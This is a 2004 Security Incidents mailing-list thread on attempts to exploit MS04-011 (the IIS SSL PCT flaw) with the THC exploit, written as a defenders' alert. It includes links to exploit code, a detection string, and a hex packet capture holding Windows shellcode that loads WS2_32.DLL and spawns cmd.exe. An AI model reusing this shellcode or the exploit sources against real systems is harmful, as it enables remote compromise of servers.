Security Incidents mailing list archives
Re: Heads up: Looks like MS04-011 exploit is being tried against www.domain
From: "Clint Bodungen" <clint () secureconsulting com>
Date: Wed, 28 Apr 2004 10:13:44 -0500
Just FYI: I've been able to successfully predict many of these incidents by regularly monitoring several lists and sites that new exploits get posted to, such as the full-disclosure mailing list. It never fails... a new exploit is posted on these lists and anywhere from hours to a few days later we get a flood of related incidents. I have scripts that monitor about 50 different locations for these exploits and the results are at http://rootexploit.net/. They update every hour and we usually discuss them in the forum and send out advance notices throughout all the members. We're talking about using this advance notice to either start writing advance Snort signatures for these exploits that are released in preparation for possible attack waves (or at least prompt a few interested members to).

----- Original Message -----
From: <falcon () secureconsulting net>
To: "James Riden o" <j.riden () massey ac nz>
Cc: <incidents () securityfocus com>
Sent: Tuesday, April 27, 2004 9:54 AM
Subject: Re: Heads up: Looks like MS04-011 exploit is being tried against www.domain
This appears to be from the THC exploit for SSL PCT released last week.
http://packetstormsecurity.nl/filedesc/THCIISSLame.c.html

Running strings against the binary and grep'ing for "THCOWNZIIS!" indicated the match.

Also be aware that what appears to be PERL-based exploit code is now readily available, too, for this vulnerability.
http://www.k-otik.com/exploits/04242004.iis5x_ssl_pct.pm.php

Our experience testing the original THC code indicated that vulnerable systems could be compromised in a matter of seconds.

Seen as long ago as 25/04/2004. Haven't seen it used against any other servers here, so it's obviously targeted in some way.

Example packet capture:

000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
140 : F0 6A FF FF 55 E4 .j..U.

--
James Riden / j.riden () massey ac nz / Systems Security Engineer
GPG public key available at: http://www.massey.ac.nz/~jriden/
This post does not necessarily represent the views of my employer.